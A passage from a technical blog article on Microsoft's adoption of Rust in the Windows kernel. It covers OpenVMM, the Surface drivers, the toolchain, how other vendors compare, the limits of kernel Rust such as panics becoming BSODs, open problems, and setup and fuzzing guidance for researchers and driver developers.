&lt;p&gt;&lt;code&gt;microsoft/openvmm&lt;/code&gt; is a modular, cross-platform Virtual Machine Monitor written in Rust. The README is candid about scope: OpenVMM &quot;can function as a traditional VMM, [but] OpenVMM&apos;s development is currently focused on its role in the OpenHCL paravisor&quot; [@openvmm-github; @openvmm-guide]. OpenHCL is the Rust paravisor for &lt;a href=&quot;https://paragmali.com/blog/inside-azure-confidential-vms-sev-snp-intel-tdx-and-the-para/&quot; rel=&quot;noopener&quot;&gt;AMD SEV-SNP and Intel TDX confidential virtual machines&lt;/a&gt; -- a guest-side software component that sits between the hardware-isolated VM and the host, mediating the small set of operations that have to round-trip [@phoronix-openhcl]. Hyperlight is Microsoft&apos;s Azure-side micro-VMM for very-low-latency function execution, with cold-start times in the low millisecond range [@newstack-russinovich].&lt;/p&gt;

A common confusion: OpenVMM is *not* the production [Hyper-V VSP (Virtualisation Service Provider) front-end](/blog/hyper-v-enlightenments-vmbus-and-the-synthetic-device-model/) that ships inside Windows 11 24H2. OpenVMM is a separate Rust VMM whose primary production deployment in 2026 is as the OpenHCL paravisor for confidential VMs in Azure [@openvmm-github]. The Rust status of the in-Windows Hyper-V VSP front-end has not been publicly announced; we treat it as Open Problem P6 in section 9.
&lt;h3&gt;6.5 The first in-box Rust drivers (Surface)&lt;/h3&gt;
&lt;p&gt;In July 2025, Microsoft&apos;s Surface team confirmed that several new Copilot+ Surface PCs ship with drivers written in Rust [@winbuzzer-surface; @thurrott-rust]. The drivers are &lt;em&gt;Microsoft-internal&lt;/em&gt; -- shipped under the Surface OEM identity, signed through Microsoft&apos;s own driver-signing keys, exempted from the WHCP path that third parties must traverse. &lt;em&gt;The Register&lt;/em&gt;, reporting in September 2025, summarised the third-party status: &quot;There is also work underway to use Rust in the Windows kernel itself, some of which shipped in Windows 11 24H2&quot; but no production third-party Rust driver has yet shipped under WHCP, because CodeQL&apos;s Rust support is in public preview at version 2.22.1 and the WHCP-validated version is still 2.21.4 [@register-2025-09-04].&lt;/p&gt;
&lt;h3&gt;6.6 The toolchain itself&lt;/h3&gt;
&lt;p&gt;The toolchain is the boring foundation that makes everything above possible. The shape, as of mid-2026:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Compiler:&lt;/strong&gt; a recent stable &lt;code&gt;rustc&lt;/code&gt; plus the MSVC linker. No specific minimum version is pinned by the public README; the LLVM dependency through &lt;code&gt;bindgen&lt;/code&gt; is what determines the version floor [@windows-drivers-rs].Earlier coverage has speculated about a &quot;rustc 1.72+&quot; minimum version pin for the Microsoft kernel target. We have not found a first-party Microsoft source that pins this exact number. The README pins LLVM 17 (the bindgen LLVM, not the rustc LLVM) and is silent on the rustc minimum version.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Target:&lt;/strong&gt; a custom &lt;code&gt;no_std&lt;/code&gt; kernel target, not upstreamed to &lt;code&gt;rust-lang/rust&lt;/code&gt;. Third-party reproducibility is therefore limited.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Bindings:&lt;/strong&gt; bindgen-generated &lt;code&gt;extern &quot;system&quot;&lt;/code&gt; declarations from WDK headers; LLVM 17 pinned because of the LLVM 18 ARM64 bug.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Allocator:&lt;/strong&gt; &lt;code&gt;wdk-alloc&lt;/code&gt; implementing &lt;code&gt;GlobalAlloc&lt;/code&gt; over &lt;code&gt;ExAllocatePool2&lt;/code&gt; / &lt;code&gt;ExFreePoolWithTag&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Panic handler:&lt;/strong&gt; &lt;code&gt;wdk-panic&lt;/code&gt; with &lt;code&gt;panic = &quot;abort&quot;&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Build orchestration:&lt;/strong&gt; &lt;code&gt;cargo-wdk&lt;/code&gt; plus &lt;code&gt;cargo-make&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Verification:&lt;/strong&gt; MIRI (where the code is portable enough to interpret), Driver Verifier (always-on inside the kernel test loop), OneFuzz and WinAFL for fuzzing, CodeQL with Rust support in public preview.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Russinovich announced at RustConf 2025 that Microsoft is also working on a &quot;Cargo plugin for MSBuild,&quot; which would let MSBuild-driven internal builds invoke &lt;code&gt;cargo&lt;/code&gt; cleanly [@newstack-russinovich]. Across Microsoft, Rust shows up in many places beyond Windows: SymCrypt-in-Rust, the Project Mu firmware effort, Azure Caliptra, the Azure Integrated HSM, and components of Azure Data Explorer all use Rust today [@infoq-russinovich]. The cross-context Microsoft Rust footprint is much larger than the in-Windows-kernel footprint alone, which gives the kernel effort upstream pressure to keep evolving.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s posture is articulated and shipping. Is this a Microsoft idiosyncrasy or a cross-vendor convergence?&lt;/p&gt;
&lt;h2&gt;7. Linux, Android, Apple, CHERI: The Cross-Vendor Picture&lt;/h2&gt;
&lt;p&gt;Microsoft is not alone. The convergence is industry-wide -- with structurally different details per vendor.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Rust for Linux.&lt;/strong&gt; Under maintainer Miguel Ojeda, Rust support landed in mainline Linux 6.1 in December 2022 [@rust-for-linux]. The &quot;experimental&quot; label was removed in late 2025. In-tree Rust drivers today include the AMCC QT2025 PHY, Android Binder, the ASIX PHY, DRM Panic QR, the Nova GPU driver (a long-term NVIDIA-replacement effort), Null Block, and the Tyr GPU; out-of-mainline-tree work includes the Apple AGX driver shipping on Asahi Linux, NVMe, and PuzzleFS [@rust-for-linux]. The structural difference from Microsoft&apos;s path is upstream: Linux &lt;em&gt;forbids&lt;/em&gt; bindgen for in-tree drivers. Every Rust binding to a kernel C struct or function must be hand-reviewed and accepted onto LKML. The acceptance criteria are public; the upstream community has been contested -- Wedson Almeida Filho resigned in September 2024 citing non-technical conflicts -- but the project continues under Ojeda and the kernel maintainers&apos; summit has reaffirmed it.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Android.&lt;/strong&gt; Google&apos;s September 2024 &quot;Eliminating Memory Safety Vulnerabilities at the Source&quot; post is the empirical anchor for this article&apos;s policy claim [@google-android-2024]. The numbers we summarised in section 5 (76% in 2019 to 24% in 2024) come from this post. The strategy is identical to Microsoft&apos;s: write new code in Rust, leave most existing C and C++ alone, observe the long-run share of memory-safety bugs drop as the old code stops being modified. Android is the proof of concept that the new-code policy works at scale.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Apple.&lt;/strong&gt; No public kernel-Rust commitment. XNU, Darwin, and IOKit remain C, C++, and Swift. The Asahi GPU project -- which lets Apple Silicon Macs boot Linux with full GPU acceleration -- is written in Rust and runs Apple hardware. But that is Rust running on Linux on Apple silicon, not Rust in Apple&apos;s own operating system. As of mid-2026, Apple has not publicly announced a Rust-in-kernel program.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;CHERI and CHERIoT.&lt;/strong&gt; The structural alternative to &quot;Rust for new code&quot; is &quot;capability hardware that enforces memory safety on every dereference, including for legacy C and C++.&quot; CHERI is the Cambridge and SRI International project that extends conventional instruction set architectures with capability pointers -- tagged, bounded, monotonic references that the hardware checks at every load and store [@cheri-cambridge]. Arm&apos;s Morello prototype processor, released in January 2022, is the first commercial-class implementation. CHERIoT is Microsoft&apos;s microcontroller adaptation, a CHERI-extended RISC-V profile aimed at embedded and IoT workloads [@cheriot-org]. The CHERIoT RTOS lives at &lt;code&gt;microsoft/cheriot-rtos&lt;/code&gt; [@cheriot-rtos-ms]. Structurally CHERI is different from Rust: it does not require a language rewrite, because the hardware enforces spatial and temporal safety on whatever language emits the pointers. Microsoft maintains both lines in parallel -- Rust for general-purpose Windows code, CHERIoT for embedded silicon -- and the two paths are complementary at the platform level.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Project Verona.&lt;/strong&gt; Still alive as Microsoft Research [@verona-github; @verona-msr]. Publications at OOPSLA and PLDI. Not productising. Region-based concurrent ownership answers a different question from Rust&apos;s per-object model. Verona&apos;s value to the kernel-Rust effort was the academic credibility it lent the safer-systems-language thread; as a productisation candidate it remains unpursued.&lt;/p&gt;

flowchart LR
  subgraph Windows
    W1[&quot;win32kbase_rs.sys&lt;br /&gt;Rust GDI/EMF&quot;]
    W2[&quot;windows-drivers-rs&lt;br /&gt;preview&quot;]
    W3[&quot;CHERIoT for IoT&lt;br /&gt;MSR plus partners&quot;]
    W4[&quot;HVCI, CFG, CET&lt;br /&gt;mitigations stack&quot;]
  end
  subgraph Linux
    L1[&quot;Rust for Linux&lt;br /&gt;mainline since 6.1&quot;]
    L2[&quot;Hand-reviewed bindings&lt;br /&gt;no bindgen in-tree&quot;]
  end
  subgraph Android
    A1[&quot;New code in Rust&lt;br /&gt;76 percent to 24 percent&quot;]
    A2[&quot;Existing C / C++&lt;br /&gt;left in place&quot;]
  end
  subgraph Apple
    AP1[&quot;XNU in C and C plus plus&lt;br /&gt;no public Rust commitment&quot;]
    AP2[&quot;Asahi GPU in Rust&lt;br /&gt;on Linux&quot;]
  end
  subgraph Hardware
    H1[&quot;Arm Morello&lt;br /&gt;CHERI prototype 2022&quot;]
    H2[&quot;CHERIoT silicon&quot;]
  end
  W1 --&amp;gt; Common[&quot;memory-safe by default&lt;br /&gt;for new code&lt;br /&gt;plus targeted rewrites&quot;]
  W2 --&amp;gt; Common
  L1 --&amp;gt; Common
  A1 --&amp;gt; Common
  Common --&amp;gt; Defense[&quot;defence in depth&lt;br /&gt;with mitigations stack&lt;br /&gt;plus CHERI hardware where available&quot;]
  W3 --&amp;gt; Defense
  W4 --&amp;gt; Defense
  H1 --&amp;gt; Defense
  H2 --&amp;gt; Defense
&lt;p&gt;The pattern across the table is consistent. Every major operating-system vendor&apos;s safest forward path is some combination of (Rust for new code) + (CHERI-class hardware capabilities where the silicon supports them) + (the existing mitigations stack as defence-in-depth). No vendor is rewriting wholesale. The vendors differ on bindgen-versus-hand-written bindings, on in-tree process discipline, on capability-hardware availability, and on the relative weight of the three threads. They agree on the shape.&lt;/p&gt;
&lt;p&gt;A compact decision matrix may help architects compare the seven approaches that were considered in the source survey.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Approach&lt;/th&gt;
&lt;th&gt;Closes bug class&lt;/th&gt;
&lt;th&gt;Worst-case crash&lt;/th&gt;
&lt;th&gt;Hardware requirement&lt;/th&gt;
&lt;th&gt;Production in Win 11 24H2&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Legacy C/C++ with &lt;code&gt;/GS&lt;/code&gt;, DEP, ASLR, CFG, CET&lt;/td&gt;
&lt;td&gt;No (raises cost)&lt;/td&gt;
&lt;td&gt;Memory corruption to exploitation&lt;/td&gt;
&lt;td&gt;None (CET on Tiger Lake+)&lt;/td&gt;
&lt;td&gt;Yes (default)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Rust in-kernel modules&lt;/td&gt;
&lt;td&gt;Yes (covered modules)&lt;/td&gt;
&lt;td&gt;Rust panic to kernel BSOD&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Yes (&lt;code&gt;win32kbase_rs.sys&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;windows-drivers-rs&lt;/code&gt; for third-party drivers&lt;/td&gt;
&lt;td&gt;Yes (per module)&lt;/td&gt;
&lt;td&gt;Driver panic to bugcheck&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Preview only&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CHERI / Arm Morello capability hardware&lt;/td&gt;
&lt;td&gt;Yes (all pointers, all languages)&lt;/td&gt;
&lt;td&gt;Capability fault, process aborted&lt;/td&gt;
&lt;td&gt;Yes (Morello, CHERIoT)&lt;/td&gt;
&lt;td&gt;No (embedded only)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Verification (MIRI, RustBelt, formal proofs)&lt;/td&gt;
&lt;td&gt;Yes (where proofs cover)&lt;/td&gt;
&lt;td&gt;Caught at build time&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Tooling only&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;OpenVMM / OpenHCL (Rust paravisor)&lt;/td&gt;
&lt;td&gt;Yes (paravisor surface)&lt;/td&gt;
&lt;td&gt;Paravisor panic in confidential VM&lt;/td&gt;
&lt;td&gt;TDX or SEV-SNP CPU&lt;/td&gt;
&lt;td&gt;Yes (Azure confidential VMs)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AI-assisted C-to-Rust migration&lt;/td&gt;
&lt;td&gt;Aspirational&lt;/td&gt;
&lt;td&gt;Per migrated module&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Research only&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The convergence is real. The strategy is articulated. So what &lt;em&gt;cannot&lt;/em&gt; Rust-in-kernel do, even when everything goes right?&lt;/p&gt;
&lt;h2&gt;8. Four Theoretical Limits Rust-in-Kernel Cannot Escape&lt;/h2&gt;
&lt;p&gt;This section is the corrective. Even when everything goes right, Rust-in-kernel runs into four principled limits.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Limit 1: the &lt;code&gt;unsafe&lt;/code&gt; boundary is irreducible.&lt;/strong&gt; Any Rust module that interoperates with the C kernel must call into it; the FFI is &lt;code&gt;unsafe&lt;/code&gt; by construction. The safety guarantee is exactly as strong as the audit of the &lt;code&gt;unsafe&lt;/code&gt; blocks. This is not a flaw in Rust; it is a property of &lt;em&gt;any&lt;/em&gt; safe-language-in-an-unsafe-substrate adoption. Inside &lt;code&gt;unsafe&lt;/code&gt;, Rust does not check what you do; it trusts the human review. The audit therefore has to be load-bearing. The &lt;code&gt;windows-drivers-rs&lt;/code&gt; README&apos;s statement that &quot;drivers ... still need to make use of unsafe blocks for interacting with the Windows operating system&quot; is the candid admission of this limit [@windows-drivers-rs; @register-2025-09-04].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Limit 2: a Rust panic at high IRQL is a kernel bugcheck.&lt;/strong&gt; Because &lt;code&gt;panic = &quot;abort&quot;&lt;/code&gt; is the only sound policy for &lt;code&gt;no_std&lt;/code&gt; kernel binaries, and because at IRQL ≥ DISPATCH_LEVEL the kernel has nowhere to send a panic except the system-wide bugcheck, a correctly-fired Rust safety check in kernel context becomes a BSOD. Check Point&apos;s &quot;Denial of Fuzzing&quot; disclosure is dispositive: Rust correctly &lt;em&gt;detected&lt;/em&gt; the out-of-bounds access, but the operational response was &lt;code&gt;SYSTEM_SERVICE_EXCEPTION&lt;/code&gt; [@checkpoint-dof; @cybersecuritynews]. Rust transforms memory-corruption CVEs into denial-of-service CVEs in the kernel context. It does &lt;em&gt;not&lt;/em&gt; eliminate the CVE class.&lt;/p&gt;
&lt;p&gt;Russinovich framed this limit as a feature, not a bug, at RustConf 2025:&lt;/p&gt;

This we view as a success ... a bug that would have actually resulted in a potential elevation of privilege, as opposed to a blue screen crash. -- Mark Russinovich, RustConf 2025 [@newstack-russinovich].
&lt;p&gt;He is right operationally. A BSOD is far cheaper than a remote code execution. But the &lt;em&gt;CVE class&lt;/em&gt; did not vanish; it shifted. The new class is &quot;panic-in-kernel-context, denial of service.&quot; That is the bug class that any future Rust-in-kernel security architect has to plan for.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Limit 3: the legacy C and C++ kernel -- roughly thirty million lines on common engineering estimates -- will not be rewritten on any plausible timeline.&lt;/strong&gt; Even Galen Hunt&apos;s &quot;1 engineer, 1 month, 1 million lines of code&quot; research aspiration -- explicitly clarified by Hunt himself as research, not a corporate mandate -- would require sustained multi-decade effort to clear the whole kernel [@register-2025-12-24; @infoworld-not-rewriting; @windowslatest-galen]. Realistically the kernel will keep most of its existing C and C++ for the foreseeable future. The wins come from partial rewrites of high-blast-radius modules plus the new-code policy. &lt;em&gt;Existing modules that do not change do not need to be rewritten to benefit from the new-code policy&lt;/em&gt; -- that is the Android empirical observation [@google-android-2024] -- but they remain potential bug-class carriers nonetheless.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Limit 4: Rust + &lt;code&gt;unsafe&lt;/code&gt; cannot beat hardware capabilities on every bug class.&lt;/strong&gt; CHERI and CHERIoT detect spatial and temporal memory-safety violations at every pointer dereference, including across the C and C++ legacy substrate that language-level approaches cannot rewrite [@cheri-cambridge; @cheriot-org].Spatial safety means accesses stay within an object&apos;s bounds; temporal safety means accesses do not touch freed objects. CHERI capabilities enforce both at the hardware ISA level for every load and store. The most defensible posture combines Rust for new code with CHERI-class hardware where the silicon supports it. Rust is necessary; on legacy code, it is not sufficient. The CHERIoT line at Microsoft (the &lt;code&gt;microsoft/cheriot-rtos&lt;/code&gt; repository [@cheriot-rtos-ms]) is the explicit acknowledgement that Microsoft is investing in both layers because neither alone closes the question.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Rust transforms memory-corruption CVEs into denial-of-service CVEs in the kernel context. It does not eliminate the CVE class -- and that is still a major win, but it is the actual win, not the marketing one.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If the policy is sound but the limits are real, what does the next decade actually look like in numbers and named open problems?&lt;/p&gt;
&lt;h2&gt;9. The 2026 Frontier and the Ten-Year Trajectory&lt;/h2&gt;
&lt;p&gt;Open problems matter when they are named. The state-of-the-art survey identified eight; each gets a paragraph here.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;P1. The public corpus size of in-kernel Rust.&lt;/strong&gt; The most recent first-party Microsoft figure remains the April 2023 number quoted to &lt;em&gt;The Register&lt;/em&gt;: about 36,000 lines of Rust in &lt;code&gt;win32kbase_rs.sys&lt;/code&gt; [@register-2023-04-27]. There has been no first-party refresh since. Any 2026 line-of-code claim greater than this -- including the &quot;over 100,000 lines&quot; framing that has circulated in secondary press -- is unsourced. We treat it as an open question.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;P2. Upstreaming the &lt;code&gt;no_std&lt;/code&gt; kernel target.&lt;/strong&gt; Microsoft&apos;s Rust kernel target is not in &lt;code&gt;rust-lang/rust&lt;/code&gt;. Third-party driver developers cannot reproduce the toolchain exactly without internal Microsoft assets. The &lt;code&gt;windows-drivers-rs&lt;/code&gt; repository contains the public-facing crates and the &lt;code&gt;cargo-wdk&lt;/code&gt; build orchestration, but the underlying compilation target is private [@windows-drivers-rs]. Upstreaming it would let external WHCP-bound driver authors build against the same toolchain as Microsoft&apos;s in-box drivers.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;P3. WHCP and driver certification.&lt;/strong&gt; As of September 2025, CodeQL supports Rust at version 2.22.1 (public preview), while only version 2.21.4 is &quot;validated for use with WHCP&quot; [@register-2025-09-04]. No production third-party Rust driver has yet shipped through WHCP. The certification path is being assembled in public; it is not yet open for production third-party submissions.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;P4. Panic-as-BSOD mitigation.&lt;/strong&gt; This is the Check Point bug class -- a correct Rust safety check in kernel context becomes a system-wide bugcheck [@checkpoint-dof]. The options are imperfect. Unwinding instead of aborting is unsound at high IRQL because the unwinder needs to run code that may itself page-fault. IRQL-aware fallbacks (degrade gracefully when at high IRQL, panic when at PASSIVE_LEVEL) are doable but add complexity. More conservative bounds-checking patterns in hot paths can reduce the panic surface but cannot eliminate it. This is an active research and engineering frontier.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;P5. Mechanised formal verification of kernel &lt;code&gt;unsafe&lt;/code&gt; blocks.&lt;/strong&gt; RustBelt-grade proofs exist for specific libraries [@rustbelt-popl-page]. Production-scale verification of arbitrary kernel &lt;code&gt;unsafe&lt;/code&gt; is open. The proof obligations are statable thanks to the RustBelt framework; discharging them at production scale across an entire driver&apos;s worth of &lt;code&gt;unsafe&lt;/code&gt; blocks is not yet routine.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;P6. The Hyper-V VSP migration.&lt;/strong&gt; OpenVMM is in flight as the modular cross-platform Rust VMM whose primary deployment in 2026 is the OpenHCL paravisor [@openvmm-github; @phoronix-openhcl]. The in-Windows Hyper-V VSP front-end&apos;s Rust status is unannounced. This is the Stage-3 P6 open problem; the article does not assert that the production Hyper-V VSP has been migrated.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;P7. AI-assisted migration.&lt;/strong&gt; Galen Hunt&apos;s &quot;1 engineer, 1 month, 1 million lines of code&quot; target is the headline aspiration [@register-2025-12-24]. The methodological dependencies are non-trivial. Code-graph construction has to be accurate. AI translation quality has to be high. Semantic-equivalence preservation has to be checkable. Manual-intervention burden at the unsafe-FFI boundary will be significant. Recent academic work on type-directed C-to-safe-Rust translation -- &lt;em&gt;Compiling C to Safe Rust, Formalized&lt;/em&gt; (Fromherz and Protzenko, OOPSLA 2026) -- shows what mechanical, proof-grade translation looks like for restricted subsets [@arxiv-c-to-rust], and that is the direction Russinovich has framed as preferred over LLM-only approaches.&lt;/p&gt;

On 24 December 2025, Galen Hunt&apos;s LinkedIn post -- *&quot;My goal is to eliminate every line of C and C++ from Microsoft by 2030 ... Our North Star is 1 engineer, 1 month, 1 million lines of code&quot;* -- was reported by *The Register* under the headline &quot;Microsoft wants to replace its entire C and C++ codebase&quot; [@register-2025-12-24]. The press cycle briefly suggested Microsoft was rewriting Windows in Rust. Within days, the picture was corrected. Hunt&apos;s own clarification: &quot;My team&apos;s project is a research project. We are building tech to make migration from language to language possible. ... [The intent was] to find like-minded engineers, not to set a new strategy for Windows 11+ or to imply that Rust is an endpoint&quot; [@infoworld-not-rewriting]. Microsoft&apos;s communications head Frank X. Shaw confirmed to Windows Latest that the company has no plans to rewrite Windows 11 using AI [@windowslatest-galen]. The &quot;1 / 1 / 1M&quot; project is a research aspiration inside the CoreAI group, not a Windows roadmap. Several outlets republished without that correction; the *InfoWorld* and *Windows Latest* pieces are the load-bearing references for the accurate framing.
&lt;p&gt;&lt;strong&gt;P8. Ten-year trajectory.&lt;/strong&gt; Three independent dynamics will determine the shape: Microsoft&apos;s conversion rate of existing high-blast-radius modules, the rate at which &lt;em&gt;new&lt;/em&gt; code is written in Rust by default, and the empirical Android curve as a reference point [@google-android-2024]. The conclusion is not that the legacy kernel will be rewritten. The conclusion is that the &lt;em&gt;share&lt;/em&gt; of memory-safety CVEs in Windows is likely to follow a trajectory shaped like Android&apos;s -- a multi-year decline driven by new-code-in-Rust plus targeted rewrites, with the absolute floor set by the residual &lt;code&gt;unsafe&lt;/code&gt; audit surface at the FFI boundary and the not-rewritten C and C++ that retains some level of new development.&lt;/p&gt;
&lt;p&gt;Quick reference for the questions almost everyone asks comes next. First, what you can do on Monday.&lt;/p&gt;
&lt;h2&gt;10. Practical Guide&lt;/h2&gt;
&lt;p&gt;Four audiences. Each gets a subsection.&lt;/p&gt;
&lt;h3&gt;10.1 For Windows-internals and security researchers&lt;/h3&gt;
&lt;p&gt;Identifying Rust-implemented kernel binaries is the first step. The Microsoft internal convention is the &lt;code&gt;_rs&lt;/code&gt; suffix; the canonical example is &lt;code&gt;%SystemRoot%\System32\win32kbase_rs.sys&lt;/code&gt;. The fastest verification:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Open PowerShell on any Windows 11 24H2 machine and run: &lt;code&gt;Get-Item C:\Windows\System32\win32kbase_rs.sys&lt;/code&gt;. If the file is present, you are running a Windows with kernel-mode Rust code today.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;{&lt;code&gt;// Demonstrates the logic of:  Test-Path &quot;\$env:SystemRoot\\System32\\win32kbase_rs.sys&quot; const knownRustKernelBinaries = [&quot;win32kbase_rs.sys&quot;]; // Insider Preview 25905 (July 12, 2023) and later const systemRoot = &quot;C:\\\\Windows&quot;; const found = knownRustKernelBinaries.map(b =&amp;gt; systemRoot + &quot;\\\\System32\\\\&quot; + b); for (const path of found) {   console.log(&quot;Expected: &quot; + path); } console.log(&quot;On a real Windows 11 24H2 install, this file is present.&quot;);&lt;/code&gt;}&lt;/p&gt;
&lt;p&gt;Reverse engineering: dumping strings against &lt;code&gt;win32kbase_rs.sys&lt;/code&gt; will surface Rust panic markers like &lt;code&gt;panic_bounds_check&lt;/code&gt;, &lt;code&gt;core::panicking::panic&lt;/code&gt;, and &lt;code&gt;core::result::unwrap_failed&lt;/code&gt; -- the names the Rust standard library inserts when bounds checks or &lt;code&gt;Option::unwrap&lt;/code&gt; calls misfire [@cybersecuritynews]. The Rust v0 name mangling scheme starts with &lt;code&gt;_R&lt;/code&gt; and uses a Punycode-derived encoding for non-ASCII characters [@rust-rfc-2603]; tools that understand the scheme (recent IDA, recent Ghidra, &lt;code&gt;rustfilt&lt;/code&gt;) demangle it. Functions like &lt;code&gt;region_from_path_mut&lt;/code&gt; will appear in the binary as mangled &lt;code&gt;_R...&lt;/code&gt; symbols.&lt;/p&gt;
&lt;p&gt;For reproducing Check Point&apos;s &quot;Denial of Fuzzing&quot; methodology: the public write-up names WinAFL plus WinAFL-Pet as the orchestration tier, with crafted EMF and EMF+ metafile corpora driving &lt;code&gt;NtGdiSelectClipPath&lt;/code&gt; and other Win32k entry points; BugId handles crash triage; MemProcFS handles memory-dump forensics [@checkpoint-dof]. The toolchain is reproducible on a research VM.&lt;/p&gt;

The Check Point harness suggests four productive bug-class targets when fuzzing the Rust kernel surface: (1) `panic_bounds_check` firings at array-indexing sites in geometry pipelines; (2) integer-overflow-checked-arithmetic divergences from C++ behaviour (Rust panics on overflow in debug builds, wraps in release -- check your build profile); (3) allocator-out-of-memory at the `wdk-alloc` boundary, where `ExAllocatePool2` can return `NULL` under pressure; (4) mismatches at `unsafe`-block invariants where a Rust safe wrapper trusts an assertion the C kernel does not actually guarantee.
&lt;h3&gt;10.2 For Windows driver developers evaluating Rust&lt;/h3&gt;
&lt;p&gt;The setup recipe for &lt;code&gt;windows-drivers-rs&lt;/code&gt;:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Clone &lt;code&gt;microsoft/windows-drivers-rs&lt;/code&gt; and &lt;code&gt;microsoft/Windows-rust-driver-samples&lt;/code&gt; [@windows-drivers-rs; @windows-rust-samples].&lt;/li&gt;
&lt;li&gt;Install a recent stable &lt;code&gt;rustc&lt;/code&gt; with the &lt;code&gt;x86_64-pc-windows-msvc&lt;/code&gt; toolchain.&lt;/li&gt;
&lt;li&gt;Install the Windows Driver Kit (WDK) from Microsoft Learn.&lt;/li&gt;
&lt;li&gt;Install LLVM 17. &lt;em&gt;Not&lt;/em&gt; LLVM 18 (ARM64 bindgen bug); LLVM 19 is the awaited fix [@windows-drivers-rs].&lt;/li&gt;
&lt;li&gt;Install &lt;code&gt;cargo-make&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Enter an eWDK developer prompt so MSBuild and the WDK environment variables are present.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;cargo install cargo-wdk&lt;/code&gt; (or take the version published on crates.io as of November 2025) [@techcommunity-rust-drivers].&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;{&lt;code&gt;// The shape of the manifest documented in microsoft/windows-drivers-rs README. const cargoToml = [   &quot;[package]&quot;,   &quot;name = \\&quot;example-driver\\&quot;&quot;,   &quot;version = \\&quot;0.1.0\\&quot;&quot;,   &quot;edition = \\&quot;2021\\&quot;&quot;,   &quot;&quot;,   &quot;[lib]&quot;,   &quot;crate-type = [\\&quot;cdylib\\&quot;]&quot;,   &quot;&quot;,   &quot;[profile.dev]&quot;,   &quot;panic = \\&quot;abort\\&quot;&quot;,   &quot;lto = true&quot;,   &quot;&quot;,   &quot;[profile.release]&quot;,   &quot;panic = \\&quot;abort\\&quot;&quot;,   &quot;lto = true&quot;,   &quot;&quot;,   &quot;[dependencies]&quot;,   &quot;wdk = \\&quot;*\\&quot;&quot;,   &quot;wdk-sys = \\&quot;*\\&quot;&quot;,   &quot;wdk-alloc = \\&quot;*\\&quot;&quot;,   &quot;wdk-panic = \\&quot;*\\&quot;&quot;,   &quot;&quot;,   &quot;[build-dependencies]&quot;,   &quot;wdk-build = \\&quot;*\\&quot;&quot;,   &quot;&quot;,   &quot;[package.metadata.wdk.driver-model]&quot;,   &quot;driver-type = \\&quot;KMDF\\&quot;&quot;,   &quot;kmdf-version-major = 1&quot;,   &quot;target-kmdf-version-minor = 33&quot; ].join(&quot;\\n&quot;); console.log(cargoToml);&lt;/code&gt;}&lt;/p&gt;
&lt;p&gt;KMDF 1.33-era bindings are on crates.io. WDM and UMDF are possible with &lt;code&gt;wdk-build&lt;/code&gt; modification but are not the documented happy path [@windows-drivers-rs]. The WHCP certification path is not yet greenlit for production third-party Rust drivers [@register-2025-09-04]. When &lt;em&gt;not&lt;/em&gt; to choose Rust: driver classes with mature, well-fuzzed C and C++ equivalents, small attack surfaces, and broad cross-vendor deployments where churn cost outweighs Rust&apos;s safety benefits. The first generation of production third-party Rust drivers will likely be filter drivers, virtual-device drivers, and parsers for untrusted formats -- exactly the surfaces where Microsoft&apos;s own first-party Surface drivers have shipped [@winbuzzer-surface; @thurrott-rust].&lt;/p&gt;
&lt;h3&gt;10.3 For security architects&lt;/h3&gt;
